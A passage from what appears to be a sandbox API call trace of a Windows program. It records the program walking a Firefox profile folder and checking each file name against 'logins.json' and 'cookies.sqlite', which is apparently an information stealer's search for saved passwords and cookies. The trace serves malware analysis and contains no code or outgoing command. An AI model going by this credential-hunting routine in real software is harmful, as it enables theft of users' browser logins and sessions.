(in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0xf [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7b0 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e80) returned 0x15 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e80 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d30) returned 0x15 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d30 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d50) returned 0x11 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d50 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d70) returned 0x13 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d70 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ed8) returned 0x100 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ed8 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0xc [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cc0) returned 0x50 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929cc0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bf0) returned 0xa [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bf0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2b8) returned 0xa [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a2b8 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2d0) returned 0xe [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a2d0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2e8) returned 0xd [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a2e8 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a300) returned 0x9 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a300 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929828) returned 0x80 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929828 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bd8) returned 0xe [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bd8 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x50 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7e0) returned 0x10 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7e0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a318) returned 0x10 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a318 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a1b0) returned 0x54 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a1b0 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c48) returned 0x54 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c48 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c10) returned 0x30 [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c10 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xa [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a810 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xa [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7f8 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0xe [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0xd [0160.821] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0160.821] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x9 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x80 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fe0 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x13 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d90 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x50 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af68 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a270) returned 0x22 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a270 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2a0) returned 0x10 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a2a0 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b70) returned 0x42 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b70 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b08) returned 0x43 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b08 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929aa0) returned 0x43 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929aa0 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bc0) returned 0x10 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bc0 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b58) returned 0x10 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b58 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929af0) returned 0x10 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929af0 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a210) returned 0x54 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a210 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3933b80) returned 0x1d4c0 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3933b80 | out: hHeap=0x2dc0000) returned 1 [0160.822] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298c0) returned 0x1d8 [0160.822] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39298c0 | out: hHeap=0x2dc0000) returned 1 [0160.822] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp")) returned 1 [0160.827] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.827] GetProcessHeap () returned 0x8e0000 [0160.827] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.827] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.827] GetProcessHeap () returned 0x8e0000 [0160.827] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.827] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbc555e20, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="downloads.sqlite", cAlternateFileName="DOWNLO~1.SQL")) returned 1 [0160.827] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.827] lstrlenW (lpString="\\") returned 1 [0160.827] GetProcessHeap () returned 0x8e0000 [0160.827] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.827] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.827] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.827] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.827] lstrlenW (lpString="downloads.sqlite") returned 16 [0160.827] GetProcessHeap () returned 0x8e0000 [0160.827] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x926420 [0160.827] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.827] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" [0160.827] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.827] GetProcessHeap () returned 0x8e0000 [0160.827] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.827] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="logins.json") returned 0x0 [0160.828] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.828] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.828] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b81e50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="extensions.ini", cAlternateFileName="EXTENS~1.INI")) returned 1 [0160.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.828] lstrlenW (lpString="\\") returned 1 [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.828] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.828] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.828] lstrlenW (lpString="extensions.ini") returned 14 [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0160.828] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.828] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" [0160.828] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.828] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="logins.json") returned 0x0 [0160.828] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="cookies.sqlite") returned 0x0 [0160.828] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.828] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b0fa30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x70000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="extensions.sqlite", cAlternateFileName="EXTENS~1.SQL")) returned 1 [0160.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.828] lstrlenW (lpString="\\") returned 1 [0160.828] GetProcessHeap () returned 0x8e0000 [0160.828] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.828] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.828] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.829] lstrlenW (lpString="extensions.sqlite") returned 17 [0160.829] GetProcessHeap () returned 0x8e0000 [0160.829] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x926420 [0160.829] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.829] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" [0160.829] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.829] GetProcessHeap () returned 0x8e0000 [0160.830] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.830] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="logins.json") returned 0x0 [0160.830] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.830] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.830] GetProcessHeap () returned 0x8e0000 [0160.830] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.830] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0160.830] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0160.830] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0160.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.830] lstrlenW (lpString="\\") returned 1 [0160.830] GetProcessHeap () returned 0x8e0000 [0160.830] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.830] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.830] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.831] lstrlenW (lpString="indexedDB") returned 9 [0160.831] GetProcessHeap () returned 0x8e0000 [0160.831] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x926420 [0160.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.831] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: 